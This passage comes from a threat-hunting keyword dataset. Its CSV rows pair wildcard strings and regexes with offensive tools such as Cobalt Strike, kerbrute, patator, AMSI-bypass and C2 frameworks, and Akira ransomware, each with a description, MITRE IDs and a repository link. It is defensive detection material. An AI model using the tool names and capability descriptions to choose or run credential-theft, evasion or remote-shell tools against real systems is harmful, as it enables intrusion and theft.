- T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*PasswordBoxImplant*",".{0,1000}PasswordBoxImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Password-Default/service.txt*",".{0,1000}Password\-Default\/service\.txt.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*passwordfox.exe*",".{0,1000}passwordfox\.exe.{0,1000}","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*passwordfox.zip*",".{0,1000}passwordfox\.zip.{0,1000}","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*passwordfox-x64.zip*",".{0,1000}passwordfox\-x64\.zip.{0,1000}","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*password-hijaker.exe*",".{0,1000}password\-hijaker\.exe.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*Passwords/Leaked-Databases*.txt*",".{0,1000}Passwords\/Leaked\-Databases.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Passwords_in_description.txt*",".{0,1000}Passwords_in_description\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Password-Scripts*",".{0,1000}Password\-Scripts.{0,1000}","offensive_tool_keyword","Password-Scripts","Password Scripts xploitation ","T1210 - T1555 - T1110 - T1554 - T1553","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/laconicwolf/Password-Scripts","1","0","N/A","N/A","1","97","37","2019-10-08T17:57:49Z","2017-10-20T17:17:23Z" "*PasswordSpray *",".{0,1000}PasswordSpray\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*passwordspray*--user-as-pass*",".{0,1000}passwordspray.{0,1000}\-\-user\-as\-pass.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*passwordspray.go*",".{0,1000}passwordspray\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*passwordSprayCmd*",".{0,1000}passwordSprayCmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*Paste this link - https://akira*",".{0,1000}Paste\sthis\slink\s\-\shttps\:\/\/akira.{0,1000}","offensive_tool_keyword","Akira","Akira ransomware Windows payload","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*patator ftp_login host=* user=FILE0 0=*.txt *",".{0,1000}patator\sftp_login\shost\=.{0,1000}\suser\=FILE0\s0\=.{0,1000}\.txt\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*patator*",".{0,1000}patator.{0,1000}","offensive_tool_keyword","patator","Patator was written out of frustration from using Hydra. Medusa. Ncrack. Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python. that strives to be more reliable and flexible than his fellow predecessors.","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/lanjelot/patator","1","0","N/A","N/A","10","3468","774","2024-01-05T00:46:45Z","2014-08-25T00:56:21Z" "*Patch-AMSI.*",".{0,1000}Patch\-AMSI\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*patchAmsiOpenSession*",".{0,1000}patchAmsiOpenSession.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","366","68","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*patch-amsi-x64-powershell.ps1*",".{0,1000}patch\-amsi\-x64\-powershell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Patch-ETW.*",".{0,1000}Patch\-ETW\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*Patching-AMSI-AmsiScanBuffer-by-rasta-mouse*",".{0,1000}Patching\-AMSI\-AmsiScanBuffer\-by\-rasta\-mouse.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","image","5","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*PatchingAPI.exe*",".{0,1000}PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*Pateensy/PaensyLib/*",".{0,1000}Pateensy\/PaensyLib\/.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*--path docToDump.xls*",".{0,1000}\-\-path\sdocToDump\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Path to a DDSpoof config file to load configuration from*",".{0,1000}Path\sto\sa\sDDSpoof\sconfig\sfile\sto\sload\sconfiguration\sfrom.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*path_dll_hijack.h*",".{0,1000}path_dll_hijack\.h.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*PATH_EXECUTION_HIJACK_PROGRAM*",".{0,1000}PATH_EXECUTION_HIJACK_PROGRAM.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*pathhijack.py*",".{0,1000}pathhijack\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*PaulSec/twittor*",".{0,1000}PaulSec\/twittor.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","752","216","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*PayGen*python3 generate.py*",".{0,1000}PayGen.{0,1000}python3\sgenerate\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*payload start tetanus*",".{0,1000}payload\sstart\stetanus.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","271","40","2024-04-29T01:01:05Z","2022-03-07T20:35:33Z" "*payload.c *",".{0,1000}payload\.c\s.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","96","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*payload.csproj*",".{0,1000}payload\.csproj.{0,1000}","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*payload.sct *",".{0,1000}payload\.sct\s.{0,1000}","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*payload/encryptor_remote.py*",".{0,1000}payload\/encryptor_remote\.py.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*payload_bootstrap_hint*",".{0,1000}payload_bootstrap_hint.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*payload_creator.py*",".{0,1000}payload_creator\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*payload_encryption.py*",".{0,1000}payload_encryption\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*payload_inject.rb*",".{0,1000}payload_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*payload_local*",".{0,1000}payload_local.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*payload_msf.c*",".{0,1000}payload_msf\.c.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*payload_msf.exe*",".{0,1000}payload_msf\.exe.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*payload_scripts.cna*",".{0,1000}payload_scripts\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*payload_scripts/sleepmask*",".{0,1000}payload_scripts\/sleepmask.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*payload_section.cpp*",".{0,1000}payload_section\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","158","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*payload_section.hpp*",".{0,1000}payload_section\.hpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","158","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*payload_spellshell.c*",".{0,1000}payload_spellshell\.c.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - 